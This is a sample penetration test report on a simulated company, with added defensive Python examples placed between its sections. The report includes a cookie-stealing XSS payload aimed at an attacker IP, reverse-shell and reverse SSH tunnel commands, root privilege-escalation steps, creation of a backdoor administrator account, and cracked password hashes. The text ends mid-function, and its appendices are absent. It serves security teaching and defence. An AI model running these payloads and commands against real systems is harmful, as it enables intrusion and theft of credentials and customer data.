Penetration Testing Sample Report

PENETRATION TEST REPORT

Archmake.com
Second Edition, 28th of February, 2012.
Offensive Security Services, LLC
19706 One Norman Blvd.
Suite B #253
Cornelius, NC 28031
United States of America
Tel: 1-402-608-1337
Fax: 1-704-625-3787
Email: info@offsec.com
Web: http://www.offensive-security.com
PENETRATION TEST REPORT - ARCHMAKE.COM
PTR-20120228 Copyright 2012 Offensive Security Ltd. All rights reserved. Page i
Table of Contents
Executive Summary 1
Summary of Results 1
Attack Narrative 3
WordPress Exploitation 3
WordPress Plugin Unintended File Type Upload 6
Linux Local Privilege Escalation 8
Maintaining Access to Compromised Webserver 10
Vulnerable Splunk Installation 11
Domain Privilege Escalation 14
Database Content Exploitation 18
Attacker Control of Archmake Transactions 22
Conclusion 23
Recommendations 23
Risk Rating 25
Appendix A: Vulnerability Detail and Mitigation 26
Risk Rating Scale 26
Unprotected WP-Admin Access 26
Vulnerable WordPress Search Plugin 26
Webserver Bzip Vulnerability 27
Vulnerable Splunk Installation 27
Hardcoded Username and Password in Executable 27
Database Unsalted Password Storage 28
Unprotected Database Server 28
Database Contains Unencrypted Credit Card Numbers 28
Lack of Transaction Verification 29
SSH Key Files not Password Protected 29
Outbound Access from Webserver 30
WordPress Upload Plugin Invalid File Type Checks 30
Appendix B: List of Changes made to Archmake Systems 31
Appendix C: About Offensive Security 32


Executive Summary
Offensive Security has been contracted to conduct a penetration test against Archmake's external web presence. The assessment was conducted in a manner that simulated a malicious actor engaged in a targeted attack against the company with the goals of:
o Identifying if a remote attacker could penetrate Archmake's defenses.
o Determining the impact of a security breach on:
    o The integrity of the company's order systems.
    o The confidentiality of the company's customer information.
    o The internal infrastructure and availability of Archmake's information systems.
The assessment was conducted in accordance with the recommendations outlined in NIST SP 800-115 [1].
The results of this assessment will be used by Archmake to drive future decisions as to the direction of their information security program. All tests and actions were conducted under controlled conditions.
Summary of Results
Network reconnaissance was conducted against the address space provided by Archmake with the understanding that this space would be considered the scope for this engagement. It was determined that the company maintains a minimal external presence, consisting of an external web site and a hosted mail service. This constituted a small attack surface, necessitating a focus on the primary website.
While reviewing the security of the primary Archmake website, it was discovered that a vulnerable WordPress plugin was installed. This plugin was successfully exploited, leading to administrative access to the WordPress installation. This access was utilized to obtain interactive access to the underlying operating system, and then escalated to root privileges.
Armed with administrative access to the Archmake webserver, Offensive Security was then able to identify internal network resources. A vulnerability in an internal system was leveraged to gain local system access, which was then escalated to domain administrator rights. This placed the entire infrastructure of the network under the control of the attackers.

[1] http://csrc.nist.gov/publications/nistpubs/800-115/SP800-115.pdf
While mapping the internal network, an application was discovered that accessed an internal corporate database. The application was compromised, and in doing so, allowed Offensive Security to gain access to the internal database where customer information is stored. Additionally, it was found that this database system manages customer orders. This system was used to process returns on attacker-controlled credit cards, allowing Offensive Security to extract funds directly from the company.

Attack Narrative
WordPress Exploitation
While conducting discovery against the target systems it was discovered that a WordPress 3.3.1 installation was in place. While this system was being reviewed for security issues, the WPScan [2] tool was used, which reported that an insecure plugin was in place.

As reported by WPScan, the Relevanssi plugin suffered from a Cross-Site Scripting vulnerability [3], documented on the Exploit Database. The aforementioned vulnerability was leveraged to conduct a Cross-Site Scripting attack, with the intent of stealing authentication cookies from an administrative user.

[2] http://code.google.com/p/wpscan
[3] http://www.exploit-db.com/exploits/16233
./wpscan.rb --url www.Archmake.com --enumerate p
____________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_| v1.1
WordPress Security Scanner by ethicalhack3r.co.uk
Sponsored by the RandomStorm Open Source Initiative
_____________________________________________________
| URL: http://www.Archmake.com/
| Started on Tue Jan 24 18:44:49 2012
[!] The WordPress theme in use is called "twentyeleven".
[!] The WordPress "http://www.Archmake.com/readme.html" file exists.
[!] WordPress version 3.3.1 identified from meta generator.
[+] Enumerating installed plugins...
Checking for 2892 total plugins... 100% complete.
[+] We found 2 plugins:
Name: relevanssi
Location: http://www.Archmake.com/wp-content/plugins/relevanssi/
Directory listing enabled? Yes.
Name: relevanssi
Location: http://www.Archmake.com/wp-content/plugins/relevanssi/
Directory listing enabled? Yes.
[+] There were 1 vulnerabilities identified from the plugin names:
[!] Relevanssi 2.7.2 Wordpress Plugin Stored XSS Vulnerability
* Reference: http://www.exploit-db.com/exploits/16233/
[+] Finished at Tue Jan 24 18:45:30 2012
To conduct this attack, Offensive Security inserted the following code into the search bar on the Archmake web site:

<script>new Image().src="http://172.16.40.204/p.php?cookie="+document.cookie; </script>

For this attack to properly execute, a user logged into the WordPress administrative interface was required to access the "User Searches" page.

When this page was accessed, the cross-site scripting attack was executed. This can be verified by accessing the view source option on the "User Searches" page.

At the time that the "User Searches" page was accessed, a remote listener was running on the attacker's machine. This captured the logged in user's authentication cookie.

This cookie was then manually inserted into Firefox using a cookie editor. This bypassed the login function by tricking WordPress into believing the attacker had already successfully authenticated to the system.

After reloading the web page, it was verified that administrative access had successfully been obtained.
GET
/p.php?cookie=wordpress_ed8a4e5dd813c7b5d262130b08955a6a=admin%7C1328098588
%7C72c3335ad1e783b75bb3d8cf9e85fc9c;%20wp-settings-time-
1=1327925790;%20wordpress_test_cookie=WP+Cookie+check;%20wordpress_logged_i
n_ed8a4e5dd813c7b5d262130b08955a6a=admin%7C1328098588%7Caf1bcabca49191de76e
c45e798ae5ada;%20wp-settings-
1=editor%3Dhtml;%20wordpress_ed8a4e5dd813c7b5d262130b08955a6a=admin%7C13275
99469%7C3ada64cf8e918c9a4bf148896181fc63;%20wordpress_logged_in_ed8a4e5dd81
3c7b5d262130b08955a6a=admin HTTP/1.1
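The stored-search attack above leaves two traces a defender can act on: the injected search term arrives in the web server's access log, and the admin page that later renders it is the place the fix belongs. The following Python is an added example, not code from the report or from Offensive Security: it parses a few constructed Apache-style log lines (the IP addresses reuse the ones in the report), flags query parameters that carry script tags or `document.cookie`, and shows the output-encoding fix for the "User Searches" page. The log lines, the parameter name `s` and the function names are assumptions.

```python
import html
import re
from urllib.parse import parse_qs, urlsplit

# Constructed access-log lines in Apache "combined" format (not taken from the report).
SAMPLE_LOG = """\
172.16.40.1 - - [24/Jan/2012:18:52:10 +0000] "GET /?s=shoes HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
172.16.40.204 - - [24/Jan/2012:18:53:41 +0000] "GET /?s=%3Cscript%3Enew+Image%28%29.src%3D%22http%3A%2F%2F172.16.40.204%2Fp.php%3Fcookie%3D%22%2Bdocument.cookie%3B%3C%2Fscript%3E HTTP/1.1" 200 5301 "-" "Mozilla/5.0"
172.16.40.1 - - [24/Jan/2012:18:55:02 +0000] "GET /wp-admin/admin.php?page=relevanssi%2Frelevanssi.php HTTP/1.1" 200 9001 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Fragments that, once the parameter is URL-decoded, indicate script injection or cookie theft.
SUSPICIOUS = [
    re.compile(r"<\s*script\b", re.I),
    re.compile(r"\bdocument\.cookie\b", re.I),
    re.compile(r"\bon[a-z]+\s*=", re.I),   # inline event handler such as onerror=
    re.compile(r"javascript:", re.I),
]


def suspicious_params(target):
    """Return {parameter: decoded value} for query parameters that look like XSS payloads."""
    hits = {}
    for name, values in parse_qs(urlsplit(target).query, keep_blank_values=True).items():
        for value in values:                      # parse_qs has already URL-decoded the value
            if any(p.search(value) for p in SUSPICIOUS):
                hits[name] = value
    return hits


def scan_log(text):
    """Walk the log and report each request whose query string carries a payload."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        hits = suspicious_params(m["target"])
        if hits:
            findings.append({"ip": m["ip"], "time": m["ts"], "params": hits})
    return findings


def render_search_term(term):
    """Server-side fix for the 'User Searches' page: HTML-encode the stored term before it
    is placed in the page, so a stored <script> tag is displayed as text, not executed."""
    return "<td>%s</td>" % html.escape(term, quote=True)
```

Encoding on output is the control that closes the stored XSS regardless of how the search term got into the database; the log scan is the detection that tells you it was attempted. Setting the `HttpOnly` flag on the WordPress authentication cookies would additionally have kept `document.cookie` from returning them.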

Once this level of administrative access was obtained, full control via the WordPress administrative interface was possible. This can result in code execution on the site through multiple methods, most directly through the editing of the WordPress theme files, which grant access to the underlying PHP code. The integrity of the webserver was now compromised, with multiple escalation paths available to the attacker.
For details of the exploited vulnerability, please see Appendix A.
WordPress Plugin Unintended File Type Upload
Once administrative access to the WordPress system had been obtained, an effort was taken to identify any additional vulnerabilities that could be leveraged by an attacker. As part of this effort, a review of the installed plugins was made.
While conducting this review, a plugin was identified that allowed for the uploading of user supplied profile images.

Upon reviewing the source code for this plugin, Offensive Security discovered that a regular expression controls the types of files that may be uploaded to the site.

The above section of code from the upload script checks for allowed file types in a flawed manner. The regular expression performs a simple string evaluation, and is the only test used to determine the file type of the object the user is attempting to upload. The intent of the regex is to match a file name such as "MyImage.png", with this highlighted portion of the name equaling the regular expression match. However, files such as "MyEvilFile.png.php" would successfully match as well, allowing the upload of an executable script.
It was decided to leverage this vulnerability to upload attacker-supplied tools and scripts to the targeted system. There are multiple ways that file transfers could be conducted with the level of access that had been obtained; however, it was decided that leveraging this process had the dual benefit of demonstrating an existing vulnerability on the site, as well as minimizing the changes made to the webserver.
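The report does not reproduce the plugin's regular expression, only its behaviour: an unanchored match that accepts "MyImage.png" and "MyEvilFile.png.php" alike. The Python below is an added example, not the plugin's code or anything from the report, that reconstructs that weak check (the exact pattern is an assumption) beside a hardened one: the allowed extension must be the final component of a tightly restricted name, the file header must agree with the claimed type, and the client-supplied name is never reused on disk. The sample file contents are constructed.

```python
import re
import secrets

# Magic bytes for the image types the plugin is meant to accept.
MAGIC = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "gif": b"GIF8",
}


def flawed_is_allowed(filename):
    """Assumed form of the plugin's check: an unanchored search succeeds as soon as
    '.png' (or another image extension) appears anywhere in the name."""
    return re.search(r"\.(png|jpe?g|gif)", filename, re.I) is not None


def hardened_is_allowed(filename, data):
    """Anchored name check plus a content check on the file header."""
    # fullmatch: one run of safe characters, one dot, one allowed extension, nothing after it.
    m = re.fullmatch(r"[A-Za-z0-9_-]{1,64}\.(png|jpe?g|gif)", filename, re.I)
    if not m:
        return False
    ext = m.group(1).lower()
    return data.startswith(MAGIC[ext])


def stored_name(filename):
    """Name to use on disk: a random token plus the validated extension, so neither the
    client's name nor any extra '.php' segment ever reaches the web root."""
    ext = filename.rsplit(".", 1)[1].lower()
    return "%s.%s" % (secrets.token_hex(16), ext)


# Constructed sample contents: a minimal PNG header and a PHP file.
SAMPLE_PNG = b"\x89PNG\r\n\x1a\n" + b"\x00\x00\x00\rIHDR"
SAMPLE_PHP = b"<?php echo 'hello'; ?>"
```

Both halves of the hardened check matter on an Apache/mod_php host: with `AddHandler` configured for `.php`, a double extension such as `.php.png` can still be executed in some configurations, so storing uploads under a generated name in a directory with script execution disabled is the belt to go with the braces.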

To verify that the upload process worked as intended, a standard graphic file was uploaded as a test. Once this was completed successfully, Offensive Security modified the name of a PHP reverse shell (pre-configured to connect back to an Offensive Security controlled system so as to not introduce an additional security vulnerability) and uploaded it to the system.
A listener was then run on the attacker-controlled system and the PHP reverse shell was accessed, resulting in interactive shell access on the remote system. Because this shell was running within the context of the webserver, it only had minimal system permissions.

For details of the exploited vulnerability, please see Appendix A.
Linux Local Privilege Escalation
With interactive access to the targeted webserver obtained, the next objective was to gain administrative access to the system.
The operating system of the webserver was determined to be "Linux version 2.6.32-5-686 (Debian 2.6.32-38) (ben@decadent.org.uk) (gcc version 4.3.5 (Debian 4.3.5-4) ) #1 SMP Mon Oct 3 04:15:24 UTC 2011". After researching potential attack vectors, it was discovered that the system was vulnerable to a race condition in bzip2. A publicly available exploit [4] for this vulnerability was found on the Exploit Database.
To escalate privileges, the exploit was uploaded to the system via the insecure upload profile picture plugin.

[4] http://www.exploit-db.com/exploits/18147
root@bt:~# nc -lvp 53
listening on [any] 53 ...
connect to [172.16.40.204] from www.Archmake.com [172.16.40.1] 34850
Linux archwww 2.6.32-5-686 #1 SMP Mon Oct 3 04:15:24 UTC 2011 i686
GNU/Linux
10:49:14 up 12 days, 23:47, 2 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
rdole tty7 :0 16Jan12 12days 5:51 0.24s x-session-
manag
rdole pts/2 :0.0 Tue10 6:01m 0.38s 44.68s gnome-
terminal
uid=33(www-data) gid=33(www-data) groups=33(www-data)


It was then a straightforward process of decompressing the executable, providing execute permissions, and running the exploit. This resulted in root level access, allowing full control of the entire webserver.

At this point, the webserver represents an internal attack platform for a malicious party. With full administrative access now available, a malicious party could utilize the system for a multitude of purposes, ranging from attacks against Archmake itself, to attacks against its customers. If this had been a true compromise, Archmake administrators would not be able to trust any data on the webserver.
For details of the exploited vulnerability, please see Appendix A.
$ cd /var/www/wp-content/uploads/2012/02
$ ls race.png.gz
race.png.gz
$ gunzip race.png.gz
$ chmod +x race.png
$ ./race.png
usage: ./race.png <cmd name>
$ ./race.png dd
id
uid=0(root) gid=33(www-data) groups=0(root),33(www-data)
Maintaining Access to Compromised Webserver
Once administrative access to the webserver had been established, further attacks against Archmake required a more stable connection than what was provided by the PHP backdoor.
Upon examining the exploited webserver, it was discovered that an SSH service was running on port 22000. It was decided that using this service was a better solution for establishing a standard method of interaction without introducing additional security vulnerabilities to the system.
In order to minimize changes to the system, SSH key-based authentication was used for authentication rather than altering or adding any user accounts. These keys work as a method of authentication through the use of public key cryptography, consisting of a public/private key pair. To enable this access, the attacker's public key was added to the authorized_keys file for the root user. Additionally, the public key of the web server was copied to the authorized_keys file of the attacking system.
With the aforementioned authentication system in place, an SSH server was started on the attacker's system on TCP port 53. We were confident that the webserver would be able to make outbound connections to the remote system using that port based upon the initial exploit. From the PHP shell environment, the command

ssh -o 'StrictHostKeyChecking no' -R 22000:127.0.0.1:22000 -p 53 172.16.40.204 ping 127.0.0.1

was executed and initiated a connection from the victim's system to the attacker. Additionally, this created a listener on the attacker's system that would tunnel local connections to the listening SSH server on the victim's system.
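The persistence step described here relies on one change: a new public key in root's authorized_keys. A periodic audit that fingerprints every key in that file and compares it against an allowlist detects exactly that change. The Python below is an added example, not part of the report or of Offensive Security's tooling. It assumes OpenSSH's authorized_keys line format and the OpenSSH SHA256 fingerprint convention (base64 of the SHA-256 of the key blob, without padding); the two key blobs are constructed from fixed bytes that stand in for real Ed25519 public keys, and the comments and allowlist are illustrative.

```python
import base64
import hashlib
import struct


def _ssh_string(b):
    """Length-prefixed string as used inside OpenSSH public-key blobs."""
    return struct.pack(">I", len(b)) + b


def make_ed25519_blob(pubkey_bytes):
    """Build the wire-format blob for an ssh-ed25519 key from 32 raw key bytes."""
    return _ssh_string(b"ssh-ed25519") + _ssh_string(pubkey_bytes)


def fingerprint(blob_b64):
    """OpenSSH-style fingerprint, as printed by `ssh-keygen -lf`: SHA256:<base64, no '='>."""
    digest = hashlib.sha256(base64.b64decode(blob_b64)).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def parse_authorized_keys(text):
    """Return one dict per key line. An options field (e.g. no-pty) is present when the
    line does not start with a key type; quoted options containing spaces are not handled."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        if parts[0].startswith(("ssh-", "ecdsa-", "sk-")):
            options, keytype, blob, comment = "", parts[0], parts[1], " ".join(parts[2:])
        else:
            options, keytype, blob, comment = parts[0], parts[1], parts[2], " ".join(parts[3:])
        entries.append({"options": options, "type": keytype,
                        "fp": fingerprint(blob), "comment": comment})
    return entries


def audit(text, allowed_fingerprints):
    """Every key whose fingerprint is not on the allowlist is a finding."""
    return [e for e in parse_authorized_keys(text) if e["fp"] not in allowed_fingerprints]


# Constructed keys: fixed bytes stand in for real Ed25519 public keys.
KNOWN_BLOB = base64.b64encode(make_ed25519_blob(b"\x01" * 32)).decode()
UNKNOWN_BLOB = base64.b64encode(make_ed25519_blob(b"\x02" * 32)).decode()

# Constructed /root/.ssh/authorized_keys: the second line is the kind of addition to look for.
SAMPLE_AUTHORIZED_KEYS = (
    "# backup job key\n"
    "no-pty ssh-ed25519 %s backup@archwww\n"
    "ssh-ed25519 %s root@bt\n" % (KNOWN_BLOB, UNKNOWN_BLOB)
)

# Allowlist of fingerprints approved through change control (constructed).
KNOWN_FINGERPRINTS = {fingerprint(KNOWN_BLOB)}
```

Run against the real file, the same comparison works with fingerprints taken from `ssh-keygen -lf` output, and the check generalises to every account's authorized_keys, not only root's; the outbound connection to TCP port 53 that the tunnel relies on is the second thing this section gives a defender to alert on.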
This tunnel was then utilized to open a standard SSH connection as the root user to the victim web server. Additionally, a SOCKS proxy was created between the two systems, allowing applications on the attacker's system to access the victim's network through the proxy. This has the effect of making all connections appear as if they are coming from the victim's system. This configuration allowed the attacker to masquerade as the victim's system.

For the purposes of the penetration test, this connection was created manually. In the instance of a true attack, it is likely that the attacker would implement an automated process to re-create the tunnels if the connection was broken for any reason.
This phase of the attack did not exploit any vulnerabilities or take advantage of any newly discovered misconfigurations on the system. It was simply the result of the level of access that had been obtained on the system due to the success of the previous attacks. This phase is where the attacker consolidated the necessary access and control to further penetrate Archmake's network. Clearly understanding this aspect is essential in understanding the scope of the penetration.
Vulnerable Splunk Installation
While inspecting the configuration of the compromised webserver, references were discovered to a 10.10.0.x network that appeared to be directly accessible by the compromised system. Network reconnaissance steps, used to discover additional assets located on this secondary network, revealed a Splunk server.
Versions of Splunk prior to 4.2.5 suffer from a remote vulnerability that can be exploited with a publicly available exploit [5] located on the Exploit Database. Using the SOCKS proxy that was previously established, Offensive Security accessed the web interface of the Splunk installation, and identified that the installed version was 4.2.2, and thus, vulnerable to attack.

[5] http://www.exploit-db.com/exploits/18245

To conduct the attack, the public exploit was transferred to the compromised webserver, and then run against the targeted system. This attack is conducted in a blind manner, resulting in no response back from the executed commands. Because the remote system was Windows-based, it was decided that an attempt would be made to create a user account on the remote system. As Splunk is often installed with local SYSTEM privileges, this user would then be added to the Administrators group.

The success of the attack was tested by attempting to use the newly created account to establish an interactive session on the targeted system via Windows Remote Desktop.
root@archwww:~/exploit# python splunk_exploit.py -h
Usage: Run splunk_exploit.py -h to see usage options
Options:
--version show program's version number and exit
-h, --help show this help message and exit
-t TARGETHOST IP Address or hostname of target splunk server
-c Generate CSRF URL only
-f Target is configured to use a Free licence and does
not
permit remote auth
-w SPLUNKWEB_PORT The Splunk admin interface port (Default: 8000)
-d SPLUNKD_PORT The Splunkd Web API port (Default: 8089)
-u USERFILE File containing usernames for use in dictionary attack
-p PASSFILE File containing passwords for use in dictionary attack
-U USERNAME Admin username (if known)
-P PASSWORD Admin pasword (if known)
-e USERPAIR Attempt to add admin user via priv up directory
traversal
magic. Accepts username:password
root@archwww:~/exploit# python splunk_exploit.py -t 10.10.0.3 -f
[i] Splunkd server found. Version:4.2.2
[i] OS:Windows 0 6
[i] Splunk web interface discovered
[i] CVAL:1480339707
[i] Configured with free licence. No auth required
[Payload Options]
[1] Pseudo Interactive Shell
[2] Perl Reverse Shell
[3] Command Exec (Blind)
Please select option 1-3:3
blind_shell>net user hacker t00rt00rt00r! /add
[i] Executing Command:net user hacker t00rt00rt00r! /add
net user hacker t00rt00rt00r! /add
blind_shell>net localgroup administrators hacker /add
[i] Executing Command:net localgroup administrators hacker /add
net localgroup administrators hacker /add

With this connection established, we verified that the created account had local administrative access. At this point, Offensive Security had a level of access equal to sitting at the physical system console of the newly compromised host.
For details of the exploited vulnerability, please see Appendix A.
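The blind command execution above produces a very recognisable pattern on the Splunk host: a local account is created and, seconds later, added to Administrators, both by the SYSTEM principal the service runs as. The Python below is an added example, not from the report, of correlating those two Windows Security events (IDs 4720 and 4732 are the real event IDs; the records are constructed and reduced to the fields needed here, so the key names are an assumption, and the allowlist of interactive administrators is illustrative).

```python
from datetime import datetime, timedelta

# Constructed Security-log records (not real data), reduced to the fields used below.
# 4720 = a user account was created; 4732 = a member was added to a security-enabled local group.
EVENTS = [
    {"time": "2012-02-01 09:00:00", "id": 4720, "subject": "rdole", "member": "jsmith"},
    {"time": "2012-02-01 10:12:03", "id": 4720, "subject": "SYSTEM", "member": "hacker"},
    {"time": "2012-02-01 10:12:09", "id": 4732, "subject": "SYSTEM", "member": "hacker",
     "group": "Administrators"},
    {"time": "2012-02-01 11:30:00", "id": 4732, "subject": "rdole", "member": "jsmith",
     "group": "Remote Desktop Users"},
]


def _ts(s):
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S")


def find_suspicious_admin_adds(events, window=timedelta(minutes=10), allowed_subjects=("rdole",)):
    """Flag additions to the local Administrators group that were performed by a principal
    not on the allowlist (SYSTEM is what a service-level compromise produces) or that follow
    the account's own creation within `window`."""
    created_at = {e["member"]: _ts(e["time"]) for e in events if e["id"] == 4720}
    alerts = []
    for e in events:
        if e["id"] != 4732 or e.get("group", "").lower() != "administrators":
            continue
        reasons = []
        when = _ts(e["time"])
        created = created_at.get(e["member"])
        if created is not None and timedelta(0) <= when - created <= window:
            reasons.append("account created %d seconds before being made an administrator"
                           % (when - created).total_seconds())
        if e["subject"] not in allowed_subjects:
            reasons.append("change made by non-interactive principal %s" % e["subject"])
        if reasons:
            alerts.append({"member": e["member"], "time": e["time"], "reasons": reasons})
    return alerts
```

The same rule, expressed in the SIEM of choice, catches the "net user /add" followed by "net localgroup administrators /add" sequence whatever tool issued it; running Splunk (or any log collector) under a dedicated low-privilege service account rather than SYSTEM removes the second reason entirely.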
Domain Privilege Escalation
To determine the full potential of this compromise, an attempt was made to escalate privileges from local administrator to domain administrator. Utilizing the compromised Splunk server, Offensive Security transferred Windows Credential Editor (WCE) [6] to the remote system through the use of the compromised webserver. WCE is a tool that allows attackers to make use of Windows credentials from memory and repurpose them for alternate use.

[6] http://www.ampliasecurity.com/research/wcefaq.html
Upon initial transfer of the WCE toolkit to the system, it was discovered that the Domain Administrator token was present within memory.

With this credential in memory, it was a simple matter of using this token to execute a new command shell that would operate with Domain Administrator rights.

This shell was then used to run the Microsoft Management Console (MMC) as the Domain Administrator. With the MMC loaded, the Active Directory Users and Computers snap-in was loaded, giving the attacker the ability to edit domain entities. This was utilized to create a new network user, which was subsequently added to the Domain Administrators group.

This new user was capable of accessing the entire Archmake Active Directory domain, with full rights and privileges. At this point, the integrity of the entire Windows network is compromised. In terms of next steps, a true attacker would have multiple tools at their disposal, including:
o Utilization of Group Policy to deploy backdoor software on all systems.
o Complete exfiltration of all data stored on any system that uses Windows authentication.
o Destruction of any and all network resources.
o Targeted attacks against any and all employees of Archmake, through the use of information gathering tools such as keystroke loggers to identify personal information.
o Leveraging this systemic access to conduct attacks against Archmake suppliers and partners that maintain a trust relationship with the company.
It was determined that while these steps would be possible, they would be considered outside the scope of the current engagement. It was demonstrated that a total compromise of the Archmake domain had been accomplished with a complete loss of integrity for all local systems.
For details of the exploited vulnerability, please see Appendix A.
Database Content Exploitation
After the Splunk server was exploited, an examination of its local file systems revealed a directory containing an executable and a CSV file.

Upon investigating the CSV file, it was found to contain Archmake's customer information that had been extracted from a database server.

It was determined that this file was generated by the exportcsv.exe program. This program was examined to obtain an understanding of its inner workings, and to determine if it contained any information that would facilitate access to the database server.
While viewing the program within a debugger, it was discovered that it created a direct connection to a Microsoft SQL server. The credentials for this connection were hard coded within the application.

By making use of these credentials, it was possible to make a direct connection to the backend database server to directly access the data.

This access allowed us to directly manipulate all data within the database.
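Credentials compiled into exportcsv.exe were found with a debugger, but the same finding is usually available much more cheaply, and a defender can make it part of a release check: extract the printable strings from a binary (as the `strings` utility does, including the UTF-16 strings Windows programs carry) and look for connection-string keys with a password beside them. The Python below is an added example, not from the report; the byte blob it scans is constructed to resemble a small Windows executable containing an ODBC-style SQL Server connection string, and the host, database and account names in it are invented.

```python
import re

# Constructed stand-in for a Windows executable: an MZ header, padding, an ASCII ODBC
# connection string, and a UTF-16LE query string (none of this is the real exportcsv.exe).
SAMPLE_BINARY = (
    b"MZ\x90\x00" + bytes(24)
    + b"Driver={SQL Server};Server=10.10.0.7;Database=orders;Uid=svc_export;Pwd=Hunter2!;"
    + bytes(8)
    + "SELECT * FROM customers".encode("utf-16le")
    + bytes(8)
)

SECRET_KEYS = re.compile(r"(?i)\b(password|pwd)\s*=\s*([^;\s]+)")
CONTEXT_KEYS = re.compile(r"(?i)\b(server|data source|database|uid|user id)\s*=\s*([^;\s]+)")


def extract_strings(data, min_len=6):
    """Printable ASCII runs (what `strings` prints) plus UTF-16LE runs of the same length."""
    ascii_runs = [m.group().decode("ascii")
                  for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, data)]
    wide_runs = [m.group().decode("utf-16le")
                 for m in re.finditer(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len, data)]
    return ascii_runs + wide_runs


def find_hardcoded_credentials(data):
    """Report every extracted string that carries a password-bearing key, with the
    surrounding connection fields and a redacted copy safe to put in a ticket."""
    findings = []
    for s in extract_strings(data):
        secret = SECRET_KEYS.search(s)
        if not secret:
            continue
        context = {k.lower(): v for k, v in CONTEXT_KEYS.findall(s)}
        findings.append({
            "secret_key": secret.group(1),
            "fields": context,
            "redacted": SECRET_KEYS.sub(r"\1=<redacted>", s),
        })
    return findings
```

A string scan of this kind in the build pipeline, with the same patterns applied to configuration files, is the cheap enforcement half of recommendation 7 below; the durable fix is to have the export job obtain its database credential at run time from the operating system's credential store or Windows integrated authentication rather than carrying it in the image.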

Utilizing this connection, an export of the database was performed. This resulted in a significant compromise of customer data. Fields that were extracted included: UserID, First and Last name, E-mail address, telephone number, encrypted password, mailing address, and various bits of user information.

After examining the output, it was determined that the password field was composed of MD5 hashes. These hashes were loaded into an Offensive Security operated password cracker. Out of the 1000 loaded hashes, 996 were recovered to clear text in twenty two seconds of operation.

The effect of this amounts to a serious compromise. The volume of personal information extracted from the database, combined with the common tendency for password re-use, could significantly impact the customers of Archmake had this been a real attack.
For details of the exploited vulnerability, please see Appendix A.
Hashes: 1002
Unique digests: 1000
Bitmaps: 13 bits, 8192 entries, 0x00001fff mask, 32768 bytes
Rules: 1
GPU-Loops: 128
GPU-Accel: 40
Password lengths range: 1 - 15
Platform: AMD compatible platform found
Watchdog: Temperature limit set to 90c
Device #1: Cayman, 2048MB, 0Mhz, 22MCU
Device #2: Cayman, 2048MB, 0Mhz, 22MCU
Device #1: Allocating 132MB host-memory
Device #1: Kernel ./kernels/4098/m0000_a0.Cayman.64.kernel (1132724 bytes)
Device #2: Allocating 132MB host-memory
Device #2: Kernel ./kernels/4098/m0000_a0.Cayman.64.kernel (1132724 bytes)

Scanned dictionary /pentest/passwords/wordlists/hatelist.txt: 2712389526
bytes, 232438151 words, 232438151 keyspace, starting attack...

9d72aa552f6628526ab1e193d4aa0f2b:abode
7e84b7b8d1c678647abafd23449a1db1:acqua
79e3d51a81199a960a370f6e4f0ba40c:abnormal
616efb73c7fc429cd5189f7f95d72746:adige
8d8bfbd10b5f6d48eb9691bb4871de62:admit
3b7770f7743e8f01f0fd807f304a21d0:adjust
c9fe0bd5322a98e0e46ea09d2c319cd2:aflame
bda059e1d21467e68b86d5b33ff78fc1:absentminded
e43fd1f89dbc258fe651ac8ecaa7a61a:admonition
...
Status.......: Exhausted
Input.Mode...: File (/pentest/passwords/wordlists/hatelist.txt)
Hash.Type....: MD5
Time.Running.: 22 secs
Time.Left....: 0 secs
Time.Util....: 22084.0ms/17923.2ms Real/CPU, 430.8% idle
Speed........: 10060.4k c/s Real, 67185.3k c/s GPU
Recovered....: 996/1000 Digests, 0/1 Salts
Progress.....: 232438151/232438151 (100.00%)
Rejected.....: 10264581/232438151 (4.42%)
HW.Monitor.#1: 0% GPU, 51c Temp
HW.Monitor.#2: 0% GPU, 44c Temp

Started: Tue Jan 31 13:43:05 2012
Stopped: Tue Jan 31 13:43:37 2012
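The cracker output above shows why unsalted MD5 fell so quickly: each dictionary word is hashed once and that single hash is compared against all 1000 users at once. The Python below is an added example, not from the report, that reproduces that lookup in miniature on a constructed wordlist and sets beside it the storage scheme that defeats it: a per-user random salt with an iterated key derivation (PBKDF2-HMAC-SHA256 from the standard library), so every guess costs the attacker one full derivation per user. The iteration count and wordlist are assumptions.

```python
import base64
import hashlib
import hmac
import os

ITERATIONS = 600_000   # assumption: chosen so one derivation costs roughly 100 ms on the login server

# Constructed wordlist, not the 232-million-word list used in the report.
SAMPLE_WORDLIST = ["abode", "acqua", "abnormal", "adjust", "aflame"]


def md5_hex(word):
    return hashlib.md5(word.encode()).hexdigest()


def unsalted_md5_lookup(stored_hashes, wordlist):
    """The cracker's method in miniature: hash each word once, then look every stored
    hash up in the table. Cost is per word, not per user, because there is no salt."""
    table = {md5_hex(w): w for w in wordlist}
    return {h: table[h] for h in stored_hashes if h in table}


def hash_password(password, salt=None, iterations=ITERATIONS):
    """Salted, iterated PBKDF2-HMAC-SHA256. The stored string carries its own
    parameters so they can be raised later without breaking existing records."""
    salt = salt if salt is not None else os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return "pbkdf2_sha256$%d$%s$%s" % (
        iterations, base64.b64encode(salt).decode(), base64.b64encode(dk).decode())


def verify_password(stored, candidate):
    """Recompute with the stored salt and iteration count; compare in constant time."""
    algo, iters, salt_b64, dk_b64 = stored.split("$")
    if algo != "pbkdf2_sha256":
        raise ValueError("unsupported hash format")
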